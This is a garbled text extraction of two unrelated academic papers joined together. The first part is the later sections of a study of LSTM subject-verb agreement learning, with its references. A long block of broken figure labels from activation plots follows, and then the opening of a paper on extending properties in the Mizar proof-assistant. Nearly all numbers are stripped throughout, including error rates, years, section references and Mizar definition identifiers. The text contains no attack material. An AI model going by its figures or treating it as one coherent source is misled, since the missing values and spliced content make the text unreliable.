contrast between the poor performance of the lms and the strong per- formance of the explicitly supervised objectives sug- gests that direct supervision has a dramatic effect on the model’s ability to learn syntax-sensitive de- pendencies. given that the google lm was already trained on several hundred times more data than the number prediction system, it appears unlikely that its relatively poor performance was due to lack of training data. additional experiments comparison to simple recurrent networks: how much of the success of the network is due to the lstm cells? we repeated the number prediction experiment with a simple recurrent network (srn) (elman, ), with the same number of hidden units. the srn’s performance was inferior to the one technical exception was that we did not replace low- frequency words with their part-of-speech, since the google lm is a large-vocabulary language model, and does not have parts-of-speech as part of its vocabulary. lstm’s, but the average performance for a given number of agreement attractors does not suggest a qualitative difference between the cell types: the srn makes about twice as many errors as the lstm across the board (figure d). training only on difficult dependencies: only a small proportion of the dependencies in the corpus had agreement attractors (figure e). would the network generalize better if dependencies with in- tervening nouns were emphasized during training? we repeated our number prediction experiment, this time training the model only on dependencies with at least one intervening noun (of any number). we doubled the proportion of training sentences to %, since the total size of the corpus was smaller ( k dependencies). this training regime resulted in a % decrease in error rate on dependencies with exactly one attractor (from . % to . %). this decrease is statistically sig- nificant, and encouraging given that the total number of dependencies in training was much lower, which complicates the learning of word embeddings. error rates mildly decreased in dependencies with more attractors as well, suggesting some generalization (figure d). surprisingly, a similar experiment us- ing the grammaticality judgment task led to a slight increase in error rate. while tentative at this point, these results suggest that oversampling difficult train- ing cases may be beneficial; a curriculum progressing from easier to harder dependencies (elman, ) may provide additional gains. error analysis singular vs. plural subjects: most of the nouns in english are singular: in our corpus, the fraction of singular subjects is %. agreement attraction errors in humans are much more common when the attractor is plural than when it is singular (bock and miller, ; eberhard et al., ). do our models’ error rates depend on the number of the subject? as figure b shows, our lstm number prediction model makes somewhat more agreement attraction errors with plural than with singular attractors; the difference is statistically significant, but the asymme- try is much less pronounced than in humans. inter- estingly, the srn version of the model does show a large asymmetry, especially as the count of attractors increases; with four plural attractors the error rate reaches % (figure e). qualitative analysis: we manually examined a sample of cases in which the majority of the runs of the number prediction network made the wrong prediction. there were only such depen- dencies (about . %). many of those were straight- forward agreement attraction errors; others were dif- ficult to interpret. we mention here three classes of errors that can motivate future experiments. the networks often misidentified the heads of noun-noun compounds. in ( ), for example, the models predict a singular verb even though the num- ber of the subject conservation refugees should be determined by its head refugees. this suggests that the networks didn’t master the structure of english noun-noun compounds. ( ) conservation refugees live in a world col- ored in shades of gray; limbo. ( ) information technology (it) assets com- monly hold large volumes of confidential data. some verbs that are ambiguous with plural nouns seem to have been misanalyzed as plural nouns and consequently act as attractors. the models predicted a plural verb in the following two sentences even though neither of them has any plural nouns, possibly because of the ambiguous verbs drives and lands: ( ) the ship that the player drives has a very high speed. ( ) it was also to be used to learn if the area where the lander lands is typical of the sur- rounding terrain. other errors appear to be due to difficulty not in identifying the subject but in determining whether it is plural or singular. in example ( ), in particular, there is very little information in the left context of the subject paragraphs suggesting that the writer considers it to be singular: the dependencies are presented as they appeared in the corpus; the predicted number was the opposite of the correct one (e.g., singular in ( ), where the original is plural). ( ) rabaul-based japanese aircraft make three dive-bombing attacks. ( ) the lead is also rather long; paragraphs is pretty lengthy for a kilobyte article. the last errors point to a limitation of the number prediction task, which jointly evaluates the model’s ability to identify the subject and its ability to assign the correct number to noun phrases. related work the majority of nlp work on neural networks eval- uates them on their performance in a task such as language modeling or machine translation (sunder- meyer et al., ; bahdanau et al., ). these evaluation setups average over many different syn- tactic constructions, making it difficult to isolate the network’s syntactic capabilities. other studies have tested the capabilities of rnns to learn simple artificial languages. gers and schmid- huber ( ) showed that lstms can learn the context-free language anbn, generalizing to ns as high as even when trained only on n ∈ { , . . . , }. simple recurrent networks struggled with this language (rodriguez et al., ; rodriguez, ). these results have been recently replicated and extended by joulin and mikolov ( ). elman ( ) tested an srn on a miniature lan- guage that simulated english relative clauses, and found that the network was only able to learn the language under highly specific circumstances (el- man, ), though later work has called some of his conclusions into question (rohde and plaut, ; cartling, ). frank et al. ( ) studied the ac- quisition of anaphora coreference by srns, again in a miniature language. recently, bowman et al. ( ) tested the ability of lstms to learn an artifi- cial language based on propositional logic. as in our study, the performance of the network degraded as the complexity of the test sentences increased. karpathy et al. ( ) present analyses and visual- ization methods for character-level rnns. kádár et al. ( ) and li et al. ( ) suggest visualization techniques for word-level rnns trained to perform tasks that aren’t explicitly syntactic (image caption- ing and sentiment analysis). early work that used neural networks to model grammaticality judgments includes allen and sei- denberg ( ) and lawrence et al. ( ). more re- cently, the connection between grammaticality judg- ments and the probabilities assigned by a language model was explored by clark et al. ( ) and lau et al. ( ). finally, arguments for evaluating nlp models on a strategically sampled set of dependency types rather than a random sample of sentences have been made in the parsing literature (rimell et al., ; nivre et al., ; bender et al., ). discussion and future work neural network architectures are typically evaluated on random samples of naturally occurring sentences, e.g., using perplexity on held-out data in language modeling. since the majority of natural language sen- tences are grammatically simple, models can achieve high overall accuracy using flawed heuristics that fail on harder cases. this makes it difficult to distin- guish simple but robust sequence models from more expressive architectures (socher, ; grefenstette et al., ; joulin and mikolov, ). our work suggests an alternative strategy—evaluation on natu- rally occurring sentences that are sampled based on their grammatical complexity—which can provide more nuanced tests of language models (rimell et al., ; bender et al., ). this approach can be extended to the training stage: neural networks can be encouraged to develop more sophisticated generalizations by oversampling grammatically challenging training sentences. we took a first step in this direction when we trained the network only on dependencies with intervening nouns (section ). this training regime indeed im- proved the performance of the network; however, the improvement was quantitative rather than qualitative: there was limited generalization to dependencies that were even more difficult than those encountered in training. further experiments are needed to establish the efficacy of this method. a network that has acquired syntactic represen- tations sophisticated enough to handle subject-verb agreement is likely to show improved performance on other structure-sensitive dependencies, including pronoun coreference, quantifier scope and negative polarity items. as such, neural models used in nlp applications may benefit from grammatically sophis- ticated sentence representations developed in a multi- task learning setup (caruana, ), where the model is trained concurrently on the task of interest and on one of the tasks we proposed in this paper. of course, grammatical phenomena differ from each other in many ways. the distribution of negative polarity items is highly sensitive to semantic factors (gian- nakidou, ). restrictions on unbounded depen- dencies (ross, ) may require richer syntactic representations than those required for subject-verb dependencies. the extent to which the results of our study will generalize to other constructions and other languages, then, is a matter for empirical research. humans occasionally make agreement attraction mistakes during language production (bock and miller, ) and comprehension (nicol et al., ). these errors persist in human acceptability judg- ments (tanner et al., ), which parallel our gram- maticality judgment task. cases of grammatical agreement with the nearest rather than structurally rel- evant constituent have been documented in languages such as slovenian (marušič et al., ), and have even been argued to be occasionally grammatical in english (zwicky, ). in future work, explor- ing the relationship between these cases and neural network predictions can shed light on the cognitive plausibility of those networks. conclusion lstms are sequence models; they do not have built- in hierarchical representations. we have investigated how well they can learn subject-verb agreement, a phenomenon that crucially depends on hierarchical syntactic structure. when provided explicit supervi- sion, lstms were able to learn to perform the verb- number agreement task in most cases, although their error rate increased on particularly difficult sentences. we conclude that lstms can learn to approximate structure-sensitive dependencies fairly well given ex- plicit supervision, but more expressive architectures may be necessary to eliminate errors altogether. fi- nally, our results provide evidence that the language modeling objective is not by itself sufficient for learn- ing structure-sensitive dependencies, and suggest that a joint training objective can be used to supplement language models on tasks for which syntax-sensitive dependencies are important. acknowledgments we thank marco baroni, grzegorz chrupała, alexan- der clark, sol lago, paul smolensky, benjamin spector and roberto zamparelli for comments and discussion. this research was supported by the european research council (grant erc- -adg bootphon), the agence nationale pour la recherche (grants anr- -idex- - psl and anr- -labx- iec) and the israeli science foundation (grant number / ). references joseph allen and mark s. seidenberg. . the emer- gence of grammaticality in connectionist networks. in brian macwhinney, editor, emergentist approaches to language: proceedings of the th carnegie sym- posium on cognition, pages – . mahwah, nj: erlbaum. dzmitry bahdanau, kyunghyun cho, and yoshua bengio. . neural machine translation by jointly learning to align and translate. in international conference for learning representations. emily m. bender, dan flickinger, stephan oepen, and yi zhang. . parser evaluation over local and non-local deep dependencies in a large corpus. in pro- ceedings of emnlp, pages – . kathryn bock and carol a. miller. . broken agree- ment. cognitive psychology, ( ): – . melissa bowerman. . the “no negative evidence” problem: how do children avoid constructing an overly general grammar? in john a. hawkins, editor, explain- ing language universals, pages – . oxford: basil blackwell. samuel r. bowman, christopher d. manning, and christopher potts. . tree-structured composi- tion in neural networks without tree-structured archi- tectures. in proceedings of the nips workshop on cog- nitive computation: integrating neural and symbolic approaches. bo cartling. . on the implicit acquisition of a context-free grammar by a simple recurrent neural net- work. neurocomputing, ( ): – . rich caruana. . multitask learning. in sebastian thrun and lorien pratt, editors, learning to learn, pages – . boston: kluwer. ciprian chelba, tomas mikolov, mike schuster, qi ge, thorsten brants, phillipp koehn, and tony robin- son. . one billion word benchmark for measur- ing progress in statistical language modeling. arxiv preprint arxiv: . . kyunghyun cho, bart van merrienboer, caglar gulcehre, dzmitry bahdanau, fethi bougares, holger schwenk, and yoshua bengio. . learning phrase repre- sentations using rnn encoder–decoder for statistical machine translation. in proceedings of emnlp, pages – . noam chomsky. . aspects of the theory of syntax. cambridge, ma: mit press. alexander clark, gianluca giorgolo, and shalom lap- pin. . statistical representation of grammaticality judgements: the limits of n-gram models. in proceed- ings of the fourth annual workshop on cognitive mod- eling and computational linguistics (cmcl), pages – . chris dyer, adhiguna kuncoro, miguel ballesteros, and a. noah smith. . recurrent neural network gram- mars. in proceedings of naacl/hlt, pages – . kathleen m. eberhard, j. cooper cutting, and kathryn bock. . making syntax of sense: number agree- ment in sentence production. psychological review, ( ): – . jeffrey l. elman. . finding structure in time. cogni- tive science, ( ): – . jeffrey l. elman. . distributed representations, sim- ple recurrent networks, and grammatical structure. ma- chine learning, ( - ): – . jeffrey l. elman. . learning and development in neu- ral networks: the importance of starting small. cogni- tion, ( ): – . martin b. h. everaert, marinus a. c. huybregts, noam chomsky, robert c. berwick, and johan j. bolhuis. . structures, not strings: linguistics as part of the cognitive sciences. trends in cognitive sciences, ( ): – . robert frank, donald mathis, and william badecker. . the acquisition of anaphora by simple recur- rent networks. language acquisition, ( ): – . felix gers and jürgen schmidhuber. . lstm re- current networks learn simple context-free and context- sensitive languages. ieee transactions on neural net- works, ( ): – . anastasia giannakidou. . negative and positive polarity items: variation, licensing, and compositional- ity. in claudia maienborn, klaus von heusinger, and paul portner, editors, semantics: an international hand- book of natural language meaning. berlin: mouton de gruyter. yoav goldberg and joakim nivre. . a dynamic ora- cle for arc-eager dependency parsing. in proceedings of coling , pages – . edward grefenstette, karl moritz hermann, mustafa su- leyman, and phil blunsom. . learning to trans- duce with unbounded memory. in advances in neural information processing systems, pages – . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . rodney huddleston and geoffrey k. pullum. . the cambridge grammar of the english language. cam- bridge university press, cambridge. armand joulin and tomas mikolov. . inferring algorithmic patterns with stack-augmented recurrent nets. in advances in neural information processing systems, pages – . rafal jozefowicz, oriol vinyals, mike schuster, noam shazeer, and yonghui wu. . exploring the limits of language modeling. arxiv preprint arxiv: . . ákos kádár, grzegorz chrupała, and afra alishahi. . representation of linguistic form and func- tion in recurrent neural networks. arxiv preprint arxiv: . . andrej karpathy, justin johnson, and fei-fei li. . visualizing and understanding recurrent networks. in iclr workshop. diederik kingma and jimmy ba. . adam: a method for stochastic optimization. in international confer- ence for learning representations. eliyahu kiperwasser and yoav goldberg. . simple and accurate dependency parsing using bidirectional lstm feature representations. transactions of the asso- ciation of computational linguistics, : – . jey han lau, alexander clark, and shalom lappin. . unsupervised prediction of acceptability judgements. in proceedings of acl/ijcnlp, pages – . steve lawrence, lee c. giles, and santliway fong. . can recurrent neural networks learn natural language grammars? in ieee international conference on neu- ral networks, volume , pages – . willem j. m. levelt, ardi roelofs, and antje s. meyer. . a theory of lexical access in speech production. behavioral and brain sciences, ( ): – . jiwei li, xinlei chen, eduard h. hovy, and dan jurafsky. . visualizing and understanding neural models in nlp. in proceedings of naacl-hlt , pages – . franc marušič, andrew nevins, and amanda saksida. . last-conjunct agreement in slovenian. in an- nual workshop on formal approaches to slavic lin- guistics, pages – . tomas mikolov, martin karafiát, lukas burget, jan cer- nockỳ, and sanjeev khudanpur. . recurrent neu- ral network based language model. in interspeech, pages – . janet l. nicol, kenneth i. forster, and csaba veres. . subject–verb agreement processes in comprehension. journal of memory and language, ( ): – . joakim nivre, laura rimell, ryan mcdonald, and carlos gomez-rodriguez. . evaluation of dependency parsers on unbounded dependencies. in proceedings of the rd international conference on computational linguistics, pages – . association for computa- tional linguistics. laura rimell, stephen clark, and mark steedman. . unbounded dependency recovery for parser evaluation. in proceedings of emnlp, pages – . paul rodriguez, janet wiles, and jeffrey l. elman. . a recurrent neural network that learns to count. con- nection science, ( ): – . paul rodriguez. . simple recurrent networks learn context-free and context-sensitive languages by count- ing. neural computation, ( ): – . douglas l. t. rohde and david c. plaut. . language acquisition in the absence of explicit negative evidence: how important is starting small? cognition, ( ): – . john robert ross. . constraints on variables in syntax. ph.d. thesis, mit. carson t. schütze. . the empirical base of linguis- tics: grammaticality judgments and linguistic method- ology. chicago, il: university of chicago press. richard socher. . recursive deep learning for natural language processing and computer vision. ph.d. thesis, stanford university. adrian staub. . on the interpretation of the number attraction effect: response time evidence. journal of memory and language, ( ): – . martin sundermeyer, ralf schlüter, and hermann ney. . lstm neural networks for language modeling. in interspeech. darren tanner, janet nicol, and laurel brehm. . the time-course of feature interference in agreement com- prehension: multiple mechanisms and asymmetrical attraction. journal of memory and language, : – . oriol vinyals, Łukasz kaiser, terry koo, slav petrov, ilya sutskever, and geoffrey hinton. . grammar as a foreign language. in advances in neural information processing systems, pages – . arnold zwicky. . agreement with nearest always bad? http://itre.cis.upenn.edu/˜myl/ languagelog/archives/ .html. th e x( s) of th e y( s) . . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . . x,y x,ysxs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . x,y x,ys xs,yxs,ys unit  : pp th e x( s) th at th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . x,y x,ysxs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . x,yx,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . x,yx,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . x,yx,ysxs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . x,yx,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . x,y x,ysxs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . x,yx,ys xs,yxs,ys unit  : pp th e x( s) th at th e y( s) . . . . . x,yx,ys xs,yxs,ys unit  : rc th e x( s) of th e y( s) . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . x,y x,ys xs,yxs,ys unit  : pp th e x( s) th at th e y( s) . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . x,yx,ysxs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . . x,yx,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . x,yx,ysxs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . x,yx,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . . x,yx,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . x,yx,ys xs,yxs,ys unit  : rc th e x( s) of th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . x,y x,ys xs,yxs,ys unit  : pp th e x( s) th at th e y( s) . . . . . x,y x,ys xs,yxs,ys unit  : rc th e x( s) of th e y( s) . . . . . . . . x,y x,ysxs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . x,yx,ysxs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . x,y x,ysxs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . x,yx,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . x,yx,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . x,y x,ys xs,yxs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . x,y x,ysxs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . . x,yx,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . x,yx,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . x,y x,ys xs,yxs,ys unit  : rc th e x( s) of th e y( s) . . . . x,yx,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . x,y x,ysxs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . . x,y x,ys xs,y xs,ys unit  : pp th e x( s) th at th e y( s) . . . . . . . x,y x,ys xs,y xs,ys unit  : rc th e x( s) of th e y( s) . . . . . . . . x,y x,ys xs,y xs,ysunit  : pp th e x( s) th at th e y( s) . . . . . . . . x,y x,ys xs,y xs,ys unit  : rc figure : activation plots for all units (see figure a). submitted june accepted october published november corresponding author artur korniłowicz, arturk@math.uwb.edu.pl academic editor marieke huisman additional information and declarations can be found on page doi . /peerj-cs. copyright korniłowicz distributed under creative commons cc-by . open access enhancement of properties in mizar artur korniłowicz institute of computer science, university of bialystok, bialystok, poland abstract a ‘‘property’’ in the mizar proof-assistant is a construction that can be used to register chosen features of predicates (e.g., ‘‘reflexivity’’, ‘‘symmetry’’), operations (e.g., ‘‘involutiveness’’, ‘‘commutativity’’) and types (e.g., ‘‘sethoodness’’) declared at the definition stage. the current implementation of mizar allows using properties for notions with a specific number of visible arguments (e.g., reflexivity for a predicate with two visible arguments and involutiveness for an operation with just one visible argument). in this paper we investigate a more general approach to overcome these limitations. we propose an extension of the mizar language and a corresponding enhancement of the mizar proof-checker which allow declaring properties of notions of arbitrary arity with respect to explicitly indicated arguments. moreover, we introduce a new property—the ‘‘fixedpoint-free’’ property of unary operations—meaning that the result of applying the operation to its argument always differs from the argument. results of tests conducted on the mizar mathematical library are presented. subjects digital libraries, theory and formal methods, programming languages keywords formal verification, mizar proof-assistant, mizar mathematical library introduction classical mathematical papers consist of sequences of definitions and justified facts classified into several categories like: theorems, lemmas, corollaries, and so on, often interspersed with some examples and descriptions. mathematical documents prepared using various proof-assistants (e.g., isabelle (isabelle, ), hol light (hol light, ), coq (coq, ), metamath (metamath, ), lean (lean, ), and mizar (mizar, )) can also contain other constructions that are processable by dedicated software. in the case of the mizar system (bancerek et al., ; grabowski, korniłowicz & naumowicz, ) such constructions are: . existential, conditional and functorial registrations which enhance processing adjectives (naumowicz, ), . term reductions which reduce terms to their proper sub-terms (korniłowicz, ), . term identifications which identify equivalent notions from different theo- ries (grabowski, korniłowicz & naumowicz, ), and . properties which can declare chosen properties of predicates, functors and types at the stage of their definitions (naumowicz & byliński, ). the current implementation of the mizar proof-assistant allows using properties for notions with a specific number of visible arguments. visible arguments are those which are explicitly used in the notation of the notion. for example, if x and y are elements of how to cite this article korniłowicz a. . enhancement of properties in mizar. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:arturk@math.uwb.edu.pl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. a group g, then for the operation x+y, where + denotes the addition of elements of the group g, x and y are visible arguments, while g is a hidden argument of the operation. in this paper we propose an extension of both the mizar language and the mizar proof- checker which allows declaring properties of notions of arbitrary arity with respect to explicitly indicated arguments. we also introduce a new property—the ‘‘fixedpoint-free’’ property of unary operations. it states that the result of applying the operation to its argument always differs from the argument. the structure of the paper is the following: in ‘mizar proof-assistant’ we present the mizar proof-assistant with the focus on its features related to the new development proposed in this paper; in ‘properties’ we describe how to define and use properties for arbitrary arguments; in ‘fixedpoint-free property’ we present the ‘‘fixedpoint-free’’ property; and finally, in ‘conclusions and future work’, we describe some conclusions and plans for next enhancements of properties in mizar. the results of implementing new features in the mizar mathematical library (mml) (bancerek et al., ; alama et al., ) are shown in both ‘properties’ and ‘fixedpoint-free property’. mizar proof-assistant the mizar project started in under the leadership of andrzej trybulec (matuszewski & rudnicki, ; grabowski, korniłowicz & naumowicz, ). the main goal of the project is to develop a computer framework that allows writing mathematical papers under the control of computer programs that check syntactical, semantical and logical correctness of texts. the mizar project consists of three main components: • a language invented to write mathematical texts to be processed by computers, • a collection of computer programs designed and implemented for processing texts written in the mizar language, with its core program, a proof-checker named verifier, suitable for formal verification (avigad & harrison, ; trybulec et al., ; wiedijk , ), and • the mizar mathematical library—a library of documents (called articles) written in the mizar language and verified by the mizar proof-checker. language the mizar language reflects the natural language of mathematics and enables computers to efficiently process documents written in the language. it implements rules for writing: formulae of various kinds, definitions, theorems, local lemmas, reasoning methods, proof steps, and other syntactic constructions instructing the proof-checker to launch dedicated algorithms for processing particular mechanisms (e.g., term identifications (grabowski, korniłowicz & naumowicz, ), term reductions (korniłowicz, ), properties of predicates and functors (naumowicz & byliński, )), etc. for the purposes of this paper we recall some basic information about how new mathematical notions can be defined in mizar articles. the mizar language allows users to define predicates, functors (linguistic functions used to define operations), attributes (naumowicz, ), types (bancerek, ), and korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. structures. the general form of a definition consists of the definition arguments, permissive assumptions (necessary to prove the correctness of the definition), its notation (prefix, infix or suffix), the result type, the definiens, correctness conditions, and some extra properties. for example, the union of two sets can be defined as follows: definition let x,y be set; func x \/ y -> set means :: xboole_ :def for x being object holds x in it iff x in x or x in y; existence; uniqueness; commutativity; idempotence; end; where the statement let x,y be set; introduces two arguments, func declares that it is a definition of an operation, x \/ y introduces the symbol \/ for the union and declares it to be used as an infix symbol, → set defines the type of the result of the operation (the union of two sets is a set), xboole_ :def is a unique identifier of the definition (it can be used to refer to the definition), for statement describes the meaning of the definition (it keyword in the definiens represents the notion being defined), existence is an automatically generated statement that has to be proved by authors to justify that there exists an object satisfying the definiens, uniqueness is another automatically generated statement that has to be proved to justify that there exists only one object satisfying the definiens, commutativity and idempotence are extra properties that can be declared and proved about the notion at this stage. one can observe that in the above example definition there are no permissive assumptions, because they are not necessary to justify the existence and uniqueness. but, for example, in the definition of a homeomorphism between two topological structures: definition let s,t be topstruct; assume s,t are_homeomorphic; mode homeomorphism of s,t -> function of s,t means :: topgrp_ :def it is being_homeomorphism; existence; end; such an assumption assume s,t are_homeomorphic; is necessary to justify the existence, because in general not all topological spaces are homeomorphic. the mizar language allows also introducing, so called, redefinitions. redefinitions can be used for the following purposes: • to change result types of operations for more specific types of arguments; for example, addition of numbers can be defined for complex numbers with the result type korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. representing complex numbers, but when arguments of the definition are, say, natural numbers, the result type of the addition can be redefined to the type representing natural numbers; • to reformulate definiens formulae in domain languages adequate to the types of arguments of the notion; for example, the inclusion of arbitrary sets can be defined in terms of elements of the sets, while when arguments of the inclusion are binary relations, the definiens of the inclusion can be formulated in terms of pairs of elements. proof checker the logical foundation of the mizar checker is classical first-order logic with equality (in some contexts, however, free second-order variables are permitted enabling the introduction of schemes, e.g., the scheme of mathematical induction). the proof system is based on the jaśkowski style of natural deduction (jaśkowski, ). structures of proofs are basically related to the structures of the formulae being proved with application of definitional expansions. from the author’s perspective, the correctness of formalized reasoning is controlled by the core utility of the mizar system, the verifier. although its proof-checking code is sufficient to guarantee logical correctness, there are successful applications of external software to perform some particular tasks during processing mizar texts (naumowicz, ; naumowicz, ; naumowicz, ). verifier is a classical proof checker based on the notion of the inference obviousness (davis, ; rudnicki, ). the basic modules of verifier are the following: parser which is responsible for controlling the lexical structure of a given text and generating the parse tree of the text. msm processor which identifies constants, variables and labels. analyzer which identifies objects and operations, performs type checking and resolves possible ambiguities caused by overloading of symbols. moreover, it verifies if constraints required by particular constructions are fulfilled. reasoner which controls structures of proofs according to the natural deduction rules. checker which verifies logical correctness of inferences. as a disprover it tries to refute negations of processed sentences. it performs propositional calculus (prechecker), equational calculus over equalities accessible in inferences (equalizer) and unification (unifier). mizar mathematical library the mizar mathematical library (mml) (bancerek et al., ; alama et al., ) was established in to accumulate mathematical knowledge formalized and verified using the mizar proof-assistant. it is a collection of papers based on the tarski-grothendieck (tg) set theory, which is a variant of the zfc set theory (hayden et al., ), where the axiom of infinity is replaced by tarski’s axiom of existence of arbitrarily large, strongly inaccessible cardinals (tarski, ). korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the current version . . of the mizar mathematical library contains articles ( , , bytes in total) devoted to various branches of mathematics. developing the mml includes the following tasks: • collecting new knowledge realized by: (a) developing background knowledge to prepare a comprehensive database for practicing mathematicians and for educational purposes; (b) formalizing entire mathematical books (gierz et al., ; bancerek & rudnicki, ); (c) formalizing well-known theorems (abad & abad, ); and (d) developing new theories (grabowski, ; grabowski, ; grabowski & jastrzebska, ). • refactoring the database (grabowski & schwarzweller, ) to keep its integrity (rud- nicki & trybulec, ) and to increase readability of the stored proofs (pąk, ). 